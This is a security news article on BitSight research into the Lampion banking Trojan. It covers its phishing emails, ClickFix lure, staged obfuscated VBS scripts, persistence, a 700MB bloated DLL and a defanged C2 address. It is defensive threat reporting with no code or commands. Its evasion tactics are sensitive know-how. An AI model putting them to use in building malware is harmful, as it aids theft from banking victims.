Lampion Banking Trojan Evolves: 700MB Bloatware DLL and ClickFix VBS Script Target Brazilian Users
Ddos 
Diagram with the new ClickFix lure | Image: Bitsight Research
Researchers at BitSight have uncovered a long-running spam campaign operated by a Brazilian threat group behind the Lampion banking Trojan, an information-stealing malware family active since 2019. The latest report reveals an updated infection chain, new persistence mechanisms, and a 700MB obfuscated DLL payload, signifying the actor’s commitment to stealth and evasion.
The researchers note that Lampion’s infection flow remains phishing-based, relying on fake Portuguese-language financial emails that trick victims into opening attachments. The chain typically begins with a ZIP file attachment, followed by a sequence of obfuscated Visual Basic scripts (VBS) that culminate in the deployment of a DLL stealer.
Over the past year, the threat actors have refined their methods across three key phases:
- September 2024: switched from download links to direct ZIP attachments.
- December 2024: adopted the ClickFix social engineering lure.
- June 2025: introduced persistence mechanisms in the first-stage script.
BitSight explains, “The group’s infection chain for dropping the stealer has remained similar to previous reports, with phishing emails used as the initial infection vector, followed by a multi-step chain of obfuscated Visual Basic scripts (VBS) that terminates by dropping a DLL into the target system.”
The emails impersonate Portuguese institutions, often mimicking legitimate bank transfer confirmations. Typical subjects include “Proof of transfer”, “Payment receipt follows”, and “Submitting your electronic receipt.”
One of the most striking evolutions in the Lampion campaign is its integration of ClickFix, a deceptive technique that instructs victims to copy and paste malicious commands directly into the Windows “Run” dialog box — effectively tricking users into executing the infection themselves.
The hosted HTML lure pretends to provide access to financial documents but instead spawns PowerShell commands that download and execute the first-stage script. Notably, the attackers’ ClickFix domains are capable of blacklisting IP addresses, thwarting both sandboxes and researchers.
Once the victim executes the malicious VBS, the malware begins its staged delivery process.
- Stage 1: Creates a persistent copy of itself in the Windows Startup folder and schedules future execution tasks.
- Stage 2: Fetches and stores the next VBS stage from attacker-controlled cloud buckets.
- Stage 3: Downloads the final Lampion stealer DLL, establishes persistence, sends telemetry to the C2, and schedules a system reboot to trigger the payload.
BitSight observed that, “The file still contains garbage variables and obfuscated strings, which make the file between 3 and 5MB in size, which after deobfuscation becomes around 35KB.”
This elaborate architecture not only obscures each step but also ensures that the malware survives reboots, complicating forensic response.
The final payload — a single 700MB DLL — represents a major shift in Lampion’s evolution. Unlike earlier versions that downloaded multiple files, the new variant uses a single, self-contained DLL embedding encrypted ZIP archives to evade antivirus scanners that impose file size limits.
BitSight reports, “The stealer now is a single DLL with sizes around 700MB. Using files with large sizes is a common technique known as bloating, whose purpose is to prevent analysis by some tools.”
The sample is Delphi-compiled, VMProtect-obfuscated, and designed to communicate with a C2 server hosted at 83.242.96[.]159, which has been in operation since 2024.
Interestingly, researchers discovered a previously undocumented component dropped by the DLL — a 23MB VBS script that continuously monitors and terminates web browsers, including Edge, Chrome, Firefox, Opera, and Brave. This is likely an anti-analysis measure to prevent researchers from examining web-based communication artifacts.
BitSight’s research highlights the multi-layered infrastructure supporting Lampion’s operations. Each stage of the infection process communicates through distinct servers — often cloud-based VPS hosts and storage buckets — that dynamically redirect requests depending on the victim’s IP reputation.
The report notes: “All components of their infrastructure contain IP blacklisting capabilities, which not only make analysis harder by breaking the infection chain, but also because the hosts responsible for blacklisting are also used as redirection points to cloud storage buckets.”
This modular infrastructure allows the operators to swap payloads, servers, or delivery methods quickly, maintaining a steady infection rate while evading blacklists and takedowns.
Donate